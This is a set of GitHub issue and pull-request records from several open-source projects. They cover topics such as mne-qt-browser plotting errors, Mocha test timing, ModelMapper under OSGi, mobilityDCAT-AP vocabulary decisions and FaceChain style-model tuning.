For general questions not directly related to this repo, please use our forum here: https://community.kodekloud.com/
2025-04-01T06:39:38.898491
2020-07-01T03:26:58
648642117
{ "authors": [ "mmurray22" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8634", "repo": "mmurray22/my-portfolio", "url": "https://github.com/mmurray22/my-portfolio/pull/17" }
gharchive/pull-request
Week 3 walkthrough 4 This PR marks the completion of Step 4 of the Walkthrough for Week 3. Further commits on this branch will reflect feedback directly on this PR and feedback given on the Week 3 Step 3 PR. *Now that Week 3 Step 3's PR has been approved, I am requesting review of this PR. Sounds good! I'll do that & open a new pull request in reply
2025-04-01T06:39:38.913960
2022-04-12T14:24:33
1201931030
{ "authors": [ "agramfort", "hoechenberger", "marsipu", "ts-mindyourmind" ], "license": "BSD-3-Clause", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8635", "repo": "mne-tools/mne-qt-browser", "url": "https://github.com/mne-tools/mne-qt-browser/issues/115" }
gharchive/issue
Plot not shown

Hi, I am running mne (v = 1.0) in VS Code (Jupyter notebook) on macOS with an M1 chip. I wanted to plot the raw data in the new qt-browser, but it only popped up the window with no time series shown, and the error message was:

```
ImportError("Unable to load OpenGL library", *err.args)
```

Hello @ts-mindyourmind, how did you install mne-qt-browser? Could you please paste the output of

```python
import mne
mne.sys_info()
```

I assume you didn't install the PyOpenGL package? It's recommended on macOS.

Can you try with raw.plot(scalings="auto")? Alex

Did you install PyOpenGL? Also your mne-qt-browser is slightly outdated; the latest version is 0.3.0, and the latest MNE version is 1.0.1.

Yes, I have installed PyOpenGL. And I upgraded mne and qt-browser just now; still not working. Still appreciate your help!

Okay, I will switch to a new environment and try again. Thanks again!

@ts-mindyourmind Could your problem be resolved? If so, I will close this issue.

Yes, it has been solved. Thank you!
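For later readers, a minimal sketch of explicitly selecting the Qt backend once PyOpenGL is installed; the file name here is hypothetical:

```python
# Sketch: force the mne-qt-browser backend; PyOpenGL is recommended on macOS.
import mne

mne.viz.set_browser_backend("qt")  # select mne-qt-browser over matplotlib
raw = mne.io.read_raw_fif("sample_raw.fif", preload=True)  # hypothetical file
raw.plot(scalings="auto")
```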
2025-04-01T06:39:38.939611
2024-06-02T22:40:09
2329895720
{ "authors": [ "moadmct" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8636", "repo": "moadmct/azure-pipelines-tasks", "url": "https://github.com/moadmct/azure-pipelines-tasks/pull/1" }
gharchive/pull-request
Update README.md branch1

Task name:
Description:
Documentation changes required: (Y/N)
Added unit tests: (Y/N)
Attached related issue: (Y/N)

Checklist:

- [ ] Task version was bumped - please check instruction how to do it
- [ ] Checked that applied changes work as expected

All good
2025-04-01T06:39:38.943274
2018-02-28T11:46:31
300993913
{ "authors": [ "moaxcp" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8637", "repo": "moaxcp/graph-dsl", "url": "https://github.com/moaxcp/graph-dsl/issues/109" }
gharchive/issue
Subgraphs

Define components of a graph:

```groovy
graph {
    edge 'A', 'B'
    subgraph {
        edge 'C', 'D'
        subgraph {
            edge 'X', 'Y'
        }
    }
    edge 'Y', 'Z'
}
```

- When a vertex or edge is added, it is added to the parent subgraphs and the main graph (may need listeners)
- graphs are maps
- a subgraph is a graph
- a subgraph can have subgraphs
- if a vertex or edge is missing an entry, it will check all parent graphs for the entry and return the found value
- a vertex or edge can be in multiple subgraphs
- a subgraph is always the same type as the main graph (they share the type variable)
- subgraphs can be named

If a named subgraph is used inside other subgraphs, what is the behavior? How does Graphviz do it?

```groovy
graph {
    subgraph {
        color = 'blue'
        edge 'A', 'B'
    }
}
```

Edges and vertices will be blue. In Graphviz:

> If a default attribute is defined using a node, edge, or graph statement, or by an attribute assignment not attached to a node or edge, any object of the appropriate type defined afterwards will inherit this attribute value. This holds until the default attribute is set to a new value, from which point the new value is used. Objects defined before a default attribute is set will have an empty string value attached to the attribute once the default attribute definition is made.
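For comparison with the DSL design above, a small sketch of how Graphviz scopes a default attribute to a subgraph, using the Python graphviz package (assumed available here) to emit DOT:

```python
# Sketch: in DOT, a default set inside a subgraph applies only to objects
# defined afterwards within that subgraph, matching the quote above.
import graphviz

g = graphviz.Graph()
with g.subgraph() as s:
    s.attr("edge", color="blue")  # edge default, scoped to this subgraph
    s.edge("A", "B")              # defined afterwards -> inherits blue
g.edge("Y", "Z")                  # outside the subgraph -> unaffected
print(g.source)                   # inspect the generated DOT
```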
2025-04-01T06:39:38.981350
2024-09-02T22:06:56
2501626713
{ "authors": [ "bartekpacia" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8638", "repo": "mobile-dev-inc/maestro", "url": "https://github.com/mobile-dev-inc/maestro/pull/2007" }
gharchive/pull-request
debug maestro-e2e-output not being present when tests fail The artifacts stopped appearing. Looks like it's caused by https://github.com/mobile-dev-inc/maestro/pull/2007. Sigh, GitHub Actions, the hopeless abomination.
2025-04-01T06:39:39.002111
2023-08-22T12:36:58
1861373234
{ "authors": [ "BWitsch", "peterlubrich" ], "license": "CC-BY-4.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8639", "repo": "mobilityDCAT-AP/mobilityDCAT-AP", "url": "https://github.com/mobilityDCAT-AP/mobilityDCAT-AP/issues/12" }
gharchive/issue
Comments from Makx Dekkers

Comments received from Makx Dekkers (SEMIC Group), email on July 21st, 2023:

1. Property: Visibility status. Could dct:accessRights not be used here? From the definition of this property at DCMI, combined with the use of the EU vocabulary "Access right", it seems that that Dublin Core property would be able to serve the need.

2. Property: Data Model Schema. Could dct:conformsTo not be used here? The definition of DCAT includes a usage note for this property that seems to align quite well with the definition of your mobilitydcatap:dataModelSchema. My general comment here is that if you define 'local' properties where you could possibly reuse existing properties, you understand that those data will not be understandable to others outside your domain. So if you share catalogue records with a more general DCAT(-AP) implementation, the access restrictions are no longer maintained. For the distributions, the information provided for dataModelSchema will be lost, while it could still be useful for the user.

3. Property: Legal Framework. In the section on Controlled Vocabularies, there is a link to https://eur-lex.europa.eu/eli-register/eu_publications_office.html as the mandatory controlled vocabulary for the property legal framework. However, that link does not point to a controlled set of terms identifying particular legal documents, but points to information on the description schema for legal documents, so I think it doesn't fit there. Maybe the only thing necessary is to add to the usage note of the property that it is recommended to use ELI to refer to legislation whenever possible. By the way, ELI is not only used for European legislation; many countries already use it for national legislation, see https://eur-lex.europa.eu/eli-register/implementation.html.

4. Class: Assessment. One problem I see here is that you have mappings from two different semantic definitions to the same property (oa:hasBody), although they really only differ in the expression of the information. First of all, this approach makes it impossible for an application that receives the data to distinguish between them, unless it looks at the encoding. Secondly, there are quite some restrictions on the use of a Literal as value of oa:hasBody: no language tag, and only plain text allowed. Otherwise you're encouraged to use oa:TextualBody. So, you could have a single property oa:hasBody with range rdfs:Resource, with the usage note that, in case you don't have a URL to point to, textual information can be included using the Embedded Textual Body construction, which allows you to specify text formats and languages, which might be relevant for multilingual purposes.

Regarding 2 (Peter Lubrich): In fact, "dct:conformsTo" might be used "to indicate the model, schema, ontology, view or profile that this representation of a dataset conforms to". However, we introduced multiple properties under the class Distribution that describe the technical format:

- format: dct:format
- data model: mobilitydcatap:dataModel
- data model version: mobilitydcatap:dataModelVersion
- data model schema: mobilitydcatap:dataModelSchema
- grammar: mobilitydcatap:grammar

-> Such differentiation is very specific to the transportation domain, and we want to have such clear differentiation!
-> We could now replace each of our proprietary properties above ("mobilitydcat-ap:...") with "dct:conformsTo".
-> But then we would lose our intended differentiation!
-> On the other side, Makx is right: any information from our proprietary properties might get lost when exchanging metadata with non-transportation portals! Your opinions?

Regarding 3 (Peter Lubrich): The question here is: is the ELI system a controlled vocabulary or not? Either way, we want to have it used for our property "mobilitydcatap:legalFramework". Suggestion:

- Add a hint in the usage note next to the property, linking to ELI, as suggested by Makx.
- Still list the ELI in our section "Controlled vocabularies to be used" (so it doesn't get ignored), but also mention there that this is not a real controlled vocabulary!

Regarding the "visibility status": The idea behind it was that data descriptions could be unfinished, on hold or in general not published. For statistics on datasets, this field has a huge benefit for the NAPs. For operating the API for data exchange, this is the filter to distinguish "sendable" or not. But it is not necessary in the DCAT-AP profile if only published data descriptions are exchanged.

Regarding 2, data format "dct:conformsTo": The information around the data format, encoding, used schema and so on is very important for data users and data services!! Therefore we should keep this differentiation. If we exchange metadata with other portals, it is up to the harvesting portal how they handle the additional information.

Regarding 4: I agree with Makx's suggestion: we will only use one single property oa:hasBody, and add a usage note about (optional) textual information.

Regarding 1: I responded to Makx as follows: _Well, when you look closely at the EU vocabulary for "Access right", it seems to control the access to content data, whereas the metadata is exchanged in any case. In contrast, we wanted to control the access/visibility of metadata. So, "Access right" seems not to be the right replacement for our proposed property. However, the only options for our property are "true" (= metadata is exchanged) or "false" (= metadata is not exchanged). The latter is not relevant, as this metadata stays (temporarily) within the data platform. In this sense, the "metadata visibility" is not information to be exchanged, but more a platform-internal piece of information. So, we will give up the "visibility status" for now. We may re-introduce it at a later time, as there are some use cases with "limited" or "restricted" metadata visibility (in transportation, much (meta)data is considered non-open!). This means that only selected receivers can see the metadata, or that some receivers can only see partial metadata. We will discuss this later._

Regarding 1: We got a response from Makx as follows: I understand you want to look at this later. As this information is not going to be exchanged but rather used by the data platform itself, it could indeed be considered at a later stage. However, contrary to what you wrote, the CatalogRecord gives information about the metadata, so asserting dct:accessRights on CatalogRecord will give the visibility of the metadata, not of the content. To describe the visibility of the content, you would use the property dct:accessRights on dcat:Dataset.
-> Conclusion: for mobilityDCAT-AP v1.0, the proposal is to take out the "visibility status" property. We might consider this again for v2.0, when we have a clearer picture about use cases of restricted metadata visibility.

Regarding 2: We got a response from Makx as follows: Making these properties sub-properties of dct:conformsTo indeed allows other DCAT implementations to understand what the general meaning of these properties is, so this makes sense. One additional comment is that, if we understand correctly, the dataModelVersion and dataModelSchema properties describe characteristics of the data model and not of the distribution, so it would be more correct to define those as properties of a separate entity, for example a class mobilitydcatap:DataModel, which could be a sub-class of dct:Standard.
-> Conclusion: I really like the proposal to introduce a new class "mobilitydcatap:DataModel":

- This class will be the range of the property "mobilitydcatap:dataModel" (so far, it has the generic range "skos:Concept").
- This class will be a sub-class of the class "dct:Standard".
- This class has two optional properties:
  - "owl:versionInfo" (formerly proposed as the proprietary property "mobilitydcatap:dataModelVersion")
  - "mobilitydcatap:dataModelSchema" (as a sub-property of "dct:conformsTo")

Regarding 3: We got a response from Makx as follows: In the work on High-Value Datasets, a property dcatap:applicableLegislation (applied to the DCAT-AP HVD extension here) was defined that has the same meaning as your property mobilitydcatap:legalFramework. You could use the more general property from the dcatap namespace.
-> Conclusion: we change the property from "mobilitydcatap:legalFramework" to "dcatap:applicableLegislation".

My conclusion for topics 1, 2, 3 above would also result in a modified UML diagram as follows. For example, note the new class "mobilitydcatap:DataModel" in the upper-right corner.

I took over all proposals under "conclusions" above for points 1, 2, 3, 4.
2020-07-06T15:19:42
651623115
{ "authors": [ "AkihiroSuda", "SamWhited", "thaJeztah" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8642", "repo": "moby/libnetwork", "url": "https://github.com/moby/libnetwork/pull/2570" }
gharchive/pull-request
[18.09 backport] bridge: disable IPv6 router advertisements

Please consider backporting this fix for CVE-2020-13401. Thanks!

Signed-off-by: Samuel Karp<EMAIL_ADDRESS>
(cherry picked from commit 153d0769a1181bf591a9637fd487a541ec7db1e6)
Signed-off-by: Sam Whited<EMAIL_ADDRESS>

18.09 is no longer maintained

I know, sadly we still have to use the bump_18.09 branch at work and don't have a way to migrate off of it yet.

/cc @adamparco
2025-04-01T06:39:39.140525
2023-04-22T19:25:08
1679668445
{ "authors": [ "mocelj", "utkarshayachit" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8643", "repo": "mocelj/azbatch-starter-connectivity", "url": "https://github.com/mocelj/azbatch-starter-connectivity/issues/6" }
gharchive/issue
linux jumpbox doesn't have Az CLI installed

After logging on to the Linux jumpbox using Bastion, az --version failed. It should have been installed, since the init script is set up to install it. Perhaps the init script is not working as expected.

Fixed issue: replaced the bash script for Linux VM configuration with a cloud-init script. The Linux VM needs to be deleted before redeploying the resources.

Closed issue.
2025-04-01T06:39:39.143095
2017-10-06T15:46:51
263490610
{ "authors": [ "ScottFreeCode", "boneskull" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8644", "repo": "mochajs/mocha", "url": "https://github.com/mochajs/mocha/issues/3056" }
gharchive/issue
normalize suite and test titles

This has bugged me since forever. Some suites and tests have titles like #foo or .foo, and some which correspond to a function have parens (#foo()) and some don't. Let's make sure this is consistent across the tests. I propose doing away with any leading or trailing punctuation.

Elsewhere I've seen # used to distinguish instance methods from static methods, and parentheses used to distinguish methods from properties, or around arguments where multiple overloads on different arguments are available. If we don't have any of that stuff, just non-overloaded instance methods, then we should be good getting rid of most of that syntax.

That's a JSDoc convention. It'll be further confused by the private field syntax on the horizon. IMO we should be decoupling the tests from the implementation as much as possible, the goal being that refactors won't result in a bunch of broken tests. I'll try to come up with an example of what that looks like.
2025-04-01T06:39:39.154182
2017-11-10T11:29:24
272903018
{ "authors": [ "ScottFreeCode", "danielserrao" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8645", "repo": "mochajs/mocha", "url": "https://github.com/mochajs/mocha/issues/3100" }
gharchive/issue
First unit test always slower than the others.

Prerequisites

- [x] Checked that your issue isn't already filed by cross referencing issues with the common mistake label
- [x] Checked next-gen ES issues and syntax problems by using the same environment and/or transpiler configuration without Mocha to ensure it isn't just a feature that actually isn't supported in the environment in question or a bug in your code.
- [x] 'Smoke tested' the code to be tested by running it outside the real test suite to get a better sense of whether the problem is in the code under test, your usage of Mocha, or Mocha itself
- [x] Ensured that there is no discrepancy between the locally and globally installed versions of Mocha. You can find them with: node node_modules/.bin/mocha --version (local) and mocha --version (global). We recommend avoiding the use of globally installed Mocha.

Description

For some reason the first unit test of my test suite is always slower than the others. When executing the tests in my console I get something like:

```
√ unit test A (483ms)
√ unit test B
```

But if, in the code, I move unit test B above unit test A, I get this:

```
√ unit test B (470ms)
√ unit test A
```

For some reason the first unit test is always the slower one, and because of that I think the reason for the slowness is not my code, but something in Mocha. At the same time, I have other test suites that are testing other code and they work fine, so I'm confused. Maybe it's not Mocha, but since I'm not sure, I need to ask if you have an idea of what can be happening.

The test is something like this:

```js
let target = require('...');

describe('Module of unit tests', function () {
    this.timeout(1000);

    before(function () {
        ...
        target = proxyquire('...', {
            'node-chartist': sinon.stub().resolves('...'),
            'ws': function () {
                return {
                    'close': function () { /* Do nothing */ },
                    'send': function () { /* Do nothing */ },
                    'on': function (arg, callback) { ... }
                };
            }
        });
    });

    // Warning happens here
    it('unit test A', function () {
        ...
        target();
        ...
    });

    // If this unit test goes above unit test A, this will be the one to get the warning.
    it('unit test B', function () {
        ...
        target();
        ...
    });
})
```

Steps to Reproduce

I tried to reproduce this in other projects without success, so I doubt you will be able to do it, but what I'm doing is:

1. Execute the test suite with unit test A above.
2. Execute the test suite with unit test B above.

Expected behavior: Don't get any warning about the time in either case.

Actual behavior: The first unit test always gets a warning about the time.

Reproduces how often: Around 90% of the time.

Versions

- node v6.11.4
- npm 3.10.10
- mocha 4.0.1
- sinon 4.1.2
- chai 3.5.0
- proxyquire 1.8.0

Additional Information

I used Fiddler to make sure that, while executing the unit tests, no network request was being made to the outside, to be sure that the delay was not caused by any network request. I also debugged the code that the unit test is testing, and I really don't see any reason for the delay in any case.

One thing worth trying is copying everything that's common to the two tests, except for any assertions, into a before hook, to see if simply running the same sort of stuff in another place makes the first place it runs of any sort slower, rather than the first test specifically. It's possible that the code, even if it's not necessarily slow in general, is initializing something the first time that then gets saved in some way (e.g. Node's require cache, or filesystem-level caches of data from the disk, or a reuse optimization built into some library code), or that the JavaScript engine looks for optimizations in the code after it runs once, or something like that. You could also put it outside the testsuite altogether, although that's less likely to work -- for a few types of caches, that would have more chance of the cache running out somewhere in between loading the test files and actually running this particular file's tests (on the other hand, if a before hook worked and outside the testsuite didn't, that might narrow down what sort of caching or optimization is responsible...).

(And on a completely different note, more workaround than solution -- for anyone who just wants to suppress the time warning, there's the slow option to go with the timeout option.)

Hi ScottFreeCode, thanks for the response, it was very useful. The problem was happening because I am making some stubs with proxyquire, and by default the npm modules are loaded even when stubbed. In my case, I have a module called node-chartist that was being loaded during the first unit test, and that is why it was slower than the others. To solve this problem I had to use the noCallThru() method of proxyquire, which makes proxyquire not load any original dependencies. Thanks for the help. Kind regards, Daniel Serrão

Glad I could help you get that figured out! Let us know if there's anything else you need.
2025-04-01T06:39:39.164894
2021-03-10T11:44:55
827603135
{ "authors": [ "DJ-Glock" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8646", "repo": "mochajs/mocha", "url": "https://github.com/mochajs/mocha/issues/4602" }
gharchive/issue
Unable to update mocha to 8.3.1: fsevents@patch - Cannot apply hunk #1
Prerequisites
[x] Checked that your issue hasn't already been filed by cross-referencing issues with the faq label
[x] Checked next-gen ES issues and syntax problems by using the same environment and/or transpiler configuration without Mocha to ensure it isn't just a feature that actually isn't supported in the environment in question or a bug in your code.
[x] 'Smoke tested' the code to be tested by running it outside the real test suite to get a better sense of whether the problem is in the code under test, your usage of Mocha, or Mocha itself
[x] Ensured that there is no discrepancy between the locally and globally installed versions of Mocha. You can find them with: node node_modules/.bin/mocha --version (local) and mocha --version (global). We recommend that you not install Mocha globally.
Description
I'm trying to update mocha from version 8.2.1 to 8.3.1. Mocha is installed as a dev dependency.
Steps to Reproduce
Set version 8.3.1 in package.json and run yarn, or use upgrade-interactive, or use yarn add mocha --dev.
Expected behavior: Mocha 8.3.1 should be installed.
Actual behavior: An error occurred:
➤ YN0066: │ fsevents@patch:fsevents@npm%3A2.3.2#builtin<compat/fsevents>::version=2.3.2&hash=127e8e: Cannot apply hunk #1 (set enableInlineHunks for details)
Versions
The output of mocha --version and node node_modules/.bin/mocha --version: 8.2.1
The output of node --version: 12.18.3
Your operating system name and version: Windows 10
architecture (32 or 64-bit): 64-bit
Your shell (e.g., bash, zsh, PowerShell, cmd): PowerShell
Your browser and version (if running browser tests): -
Any third-party Mocha-related modules (and their versions): yarn 2.3.3
Any code transpiler (e.g., TypeScript, CoffeeScript, Babel) being used (and its version): -
I searched for this error and found many issues from 2020, but all of them were resolved somehow, so I am not sure why it occurred for me, especially on Windows.
@juergba you might be right about it being optional. It looks like the chain is: mocha requires chokidar, and chokidar requires fsevents, but optionally. I have no idea why yarn 2 tries to install the optional dependency and why the --ignore-optional flag does not work, as per this issue. I'll raise another issue for the yarn team. Thanks.
Update: the issue was fixed in yarn 2.4.1. We updated yarn to 2.4.0 and the issue was still present, but after updating yarn to 2.4.1 everything is fine. Hope this will help someone.
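For anyone landing here, a sketch of the upgrade step that resolved it, assuming Yarn 2's built-in version switcher (run from the project root):
yarn set version 2.4.1
yarn install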
2025-04-01T06:39:39.168131
2017-01-17T21:53:08
201416219
{ "authors": [ "Munter", "coveralls" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8647", "repo": "mochajs/mocha", "url": "https://github.com/mochajs/mocha/pull/2672" }
gharchive/pull-request
Coverage for node tests
This PR does the following:
Adds nyc, istanbul-combine and coveralls as dependencies
Adds an environment switch in the Makefile on COVERAGE=true, where coverage is gathered from the test-node target and sub-targets
Adds an npm coverage script that runs make test with COVERAGE=true for local coverage collection
Adds coverage collection on travis for node 7
Posts the coverage report to coveralls
closes #2620 #2351
Thanks to @c089 for getting the basic setup in the Makefile working
Changes Unknown when pulling 820d61639a95e808d58ea73f0860f7e139b2b7da on Munter:coverage-report into ** on mochajs:master**.
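Per the description, local collection would look something like this (a sketch; the target and script names are as listed above):
COVERAGE=true make test
# or, via the added npm script:
npm run coverage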
2025-04-01T06:39:39.173844
2022-06-14T17:47:39
1271145747
{ "authors": [ "AlexandreBrown" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8648", "repo": "mockative/mockative", "url": "https://github.com/mockative/mockative/issues/41" }
gharchive/issue
How do we mock flow/shared flow?
Description
Hello, I'd like to test that myDependency2.someFun() is called when receiving a value from myDependency1.myFlow, which is a Flow<Unit>.
class MyClass(
    private val coroutineScope: CoroutineScope,
    private val myDependency1: MyDependency1,
    private val myDependency2: MyDependency2,
) : MyClassInterface, CoroutineScope by coroutineScope {
    init {
        launch(coroutineContext) {
            myDependency1.myFlow.collect {
                myDependency2.someFun()
            }
        }
    }
}
Attempt
@Mock
private val myDependency1 = mock(MyDependency1::class)
@Mock
private val myDependency2 = mock(MyDependency2::class)
private val myFlow = MutableSharedFlow<Unit>()
...
"my test" {
    given(myDependency1).getter(myDependency1::myFlow)
        .whenInvoked()
        .thenReturn(myFlow)
    val myClass = MyClass(this, myDependency1, myDependency2)
    myFlow.emit(Unit)
    verify(myDependency2).function(myDependency2::someFun)
        .wasInvoked(exactly = 1.time)
}
Result (error)
A mock of type MyDependency2 was not invoked the expected number of times.
Expected 1 invocations of someFun()
Actual: 0
No invocation on the mock were recorded.
Turns out this was not an issue about Mockative. Closing this issue.
2025-04-01T06:39:39.210415
2017-01-14T09:24:58
200792663
{ "authors": [ "modelica-trac-importer" ], "license": "BSD-3-Clause", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8649", "repo": "modelica/Modelica", "url": "https://github.com/modelica/Modelica/issues/734" }
gharchive/issue
Wrong experiment annotation for Modelica.Mechanics.Translational.Examples.Accelerate
Reported by beutlich on 2 May 2012 11:28 UTC
The model Modelica.Mechanics.Translational.Examples.Accelerate has the experiment keyword on the Diagram annotation by mistake. See the attached diff file for a simple fix.
Migrated-From: https://trac.modelica.org/Modelica/ticket/734
Comment by dietmarw on 2 May 2012 11:37 UTC
Thanks, it is already fixed in trunk in 8ae903717121f7689a300c0c9d66e2eee3820845.
Comment by beutlich on 2 May 2012 11:47 UTC
The fix should also be included in the /maintenance/3.2 branch.
Comment by dietmarw on 2 May 2012 11:58 UTC
Good point! Fix applied in 2aa9f4f0743210f1cc8e136b3ec95e03db13a1d5 for maintenance/3.2
2025-04-01T06:39:39.242195
2020-09-11T01:22:17
698692316
{ "authors": [ "chhsiao90", "elmer25", "mladBlum" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8650", "repo": "modelmapper/modelmapper", "url": "https://github.com/modelmapper/modelmapper/issues/561" }
gharchive/issue
Using modelmapper 2.3.8 with java.lang.ClassNotFoundException
I am running with org.modelmapper:modelmapper:2.3.8 from Maven Central at https://search.maven.org/search?q=g:org.modelmapper
When I attempt to run the ModelMapper inside an assembler (see below):
public class AccountAssembler implements DtoEntityAssembler<AccountEntity, AccountDto> {
    private static final AddressAssembler addressAssembler = new AddressAssembler();
    private static final PhoneAssembler phoneAssembler = new PhoneAssembler();

    public AccountEntity toEntity(AccountDto account) {
        ModelMapper mapper = new ModelMapper();
        mapper.createTypeMap(AccountDto.class, AccountEntity.class)
            .addMapping(AccountDto::getAccountId, AccountEntity::setAccountId) // Integer
            .addMapping(AccountDto::getAddress, AccountEntity::setAddress)
            .addMapping(AccountDto::getBookerAccountKey, AccountEntity::setBookerAccountKey) // String
            .addMapping(AccountDto::getEmail, AccountEntity::setEmail) // String
            .addMapping(AccountDto::getKey, AccountEntity::setKey) // String
            .addMapping(AccountDto::getMap, AccountEntity::setMap) // String
            .addMapping(AccountDto::getName, AccountEntity::setName) // String
            .addMapping(AccountDto::getWebsite, AccountEntity::setWebsite); // String
        return mapper.map(account, AccountEntity.class);
    }

    public AccountDto toDto(AccountEntity account) {
        ModelMapper mapper = new ModelMapper();
        mapper.createTypeMap(AccountEntity.class, AccountDto.class)
            .addMapping(AccountEntity::getAccountId, AccountDto::setAccountId)
            .addMapping(AccountEntity::getAddress, (dest, v) -> dest.setAddress(addressAssembler.toDto((AddressEntity) v)))
            .addMapping(AccountEntity::getBookerAccountKey, AccountDto::setBookerAccountKey)
            .addMapping(AccountEntity::getEmail, AccountDto::setEmail)
            .addMapping(AccountEntity::getKey, AccountDto::setKey)
            .addMapping(AccountEntity::getMap, AccountDto::setMap)
            .addMapping(AccountEntity::getName, AccountDto::setName)
            .addMapping(AccountEntity::getWebsite, AccountDto::setWebsite);
        return mapper.map(account, AccountDto.class);
    }
}
I get the following root cause in my stack trace:
Caused by: java.lang.ClassNotFoundException: sun.reflect.ReflectionFactory not found by modelmapper [18]
I am using the Apache Felix framework. From my research, I understand that sun.reflect is not publicly available. I don't know how to work around this currently. Are there any ideas?
I am currently running Java 8 and want to upgrade to the most recent Java version at a future time. I will remain running within a Java framework like Felix or similar. Any ideas how to get around this would be greatly appreciated.
I think this issue is related to this one: https://github.com/modelmapper/modelmapper/issues/426
Can you check if the latest modelmapper can reproduce this issue? Thanks!
I am not the thread owner. Nevertheless, I cannot reproduce the issue in the latest release (2.4.0). I was able to completely remove the jdk.unsupported attribute. Thank you!
Thanks for the feedback! I will close the issue. Please feel free to reopen this issue or create a new one if this issue is still reproducible.
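For anyone applying the same fix, the resolution is a plain dependency bump to 2.4.0; a sketch of the Maven coordinates (adjust to your build tool):
<dependency>
    <groupId>org.modelmapper</groupId>
    <artifactId>modelmapper</artifactId>
    <version>2.4.0</version>
</dependency>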
2025-04-01T06:39:39.249838
2023-09-12T09:19:19
1892061720
{ "authors": [ "hehaha68", "iotang", "sunbaigui" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8651", "repo": "modelscope/facechain", "url": "https://github.com/modelscope/facechain/pull/220" }
gharchive/pull-request
(zju_15) Providing 1 new style model
Providing 1 style model compatible with MajicmixRealistic_v6: Jacket in Snow Mountain style.
Portraits used for training
Jacket in Snow Mountain
I tested this style, the effect is pretty good. Can we continue to tune the prompt and parameters a bit? The multiplier_style can be lower. My prompt and parameters:
'multiplier_style': 0.6,
'multiplier_human': 0.9,
'add_prompt_style': '1 girl, close-up, fur, ((jacket)), shirt, pants, winter, (bright sunny day, snow mountain, alpine slopes, snow), gyaru, fashion, trendy, gentle hair'
Wow, your tuned results work noticeably better. Let us update those prompts and parameters after the merge.
hi, @iotang if there's a better parameter & prompt, could you change it first, and update your style showcase.
I updated the parameters and prompts and the result is as shown below. Human LoRA may make the results different. The style image has been updated too.
2025-04-01T06:39:39.272344
2020-05-19T23:09:36
621341247
{ "authors": [ "aregm" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8654", "repo": "modin-project/modin", "url": "https://github.com/modin-project/modin/issues/1465" }
gharchive/issue
[Boards] test System information OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Modin installed from (source or binary): Modin version: Python version: Exact command to reproduce: Test from Github New test from Github
2025-04-01T06:39:39.275234
2020-07-10T16:39:23
654902423
{ "authors": [ "deepalib-cuelogic", "devin-petersohn", "pyrito" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8655", "repo": "modin-project/modin", "url": "https://github.com/modin-project/modin/issues/1706" }
gharchive/issue
self._query_compiler.columns RecursionError: maximum recursion depth exceeded while calling a Python object System information OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Modin version (modin.__version__): Python version: Code we can use to reproduce: Describe the problem Source code / logs Hi @deepalib-cuelogic thanks for posting! We need more information to reproduce and fix this issue. Can you share the code that produced this error? Thanks! Closing due to lack of information/reproducer.
2025-04-01T06:39:39.293368
2022-03-06T11:39:35
1160587978
{ "authors": [ "Nicolas-Ferre", "codecov-commenter" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8656", "repo": "modor-engine/modor", "url": "https://github.com/modor-engine/modor/pull/52" }
gharchive/pull-request
Create physics module
Closes #40
Codecov Report
Merging #52 (14f50af) into main (71779df) will increase coverage by 99.96%. The diff coverage is 99.52%.
@@            Coverage Diff             @@
##           main      #52        +/-   ##
==========================================
+ Coverage      0   99.96%    +99.96%
==========================================
  Files         0       38        +38
  Lines         0     3148      +3148
==========================================
+ Hits          0     3147      +3147
- Misses        0        1         +1
Impacted Files / Coverage Δ
crates/modor/src/actions.rs 100.00% <ø> (ø)
crates/modor/src/entities.rs 100.00% <ø> (ø)
crates/modor/src/system_runner.rs 100.00% <ø> (ø)
crates/modor_physics/src/lib.rs 100.00% <ø> (ø)
crates/modor/src/testing.rs 99.20% <95.23%> (ø)
crates/modor_physics/src/components/acceleration.rs 100.00% <100.00%> (ø)
crates/modor_physics/src/components/position.rs 100.00% <100.00%> (ø)
crates/modor_physics/src/components/scale.rs 100.00% <100.00%> (ø)
crates/modor_physics/src/components/velocity.rs 100.00% <100.00%> (ø)
crates/modor_physics/src/entities/delta_time.rs 100.00% <100.00%> (ø)
... and 33 more
Continue to review full report at Codecov.
Legend: Δ = absolute <relative> (impact), ø = not affected, ? = missing data
Powered by Codecov. Last update 71779df...14f50af. Read the comment docs.
2025-04-01T06:39:39.375693
2024-09-03T07:59:47
2502186539
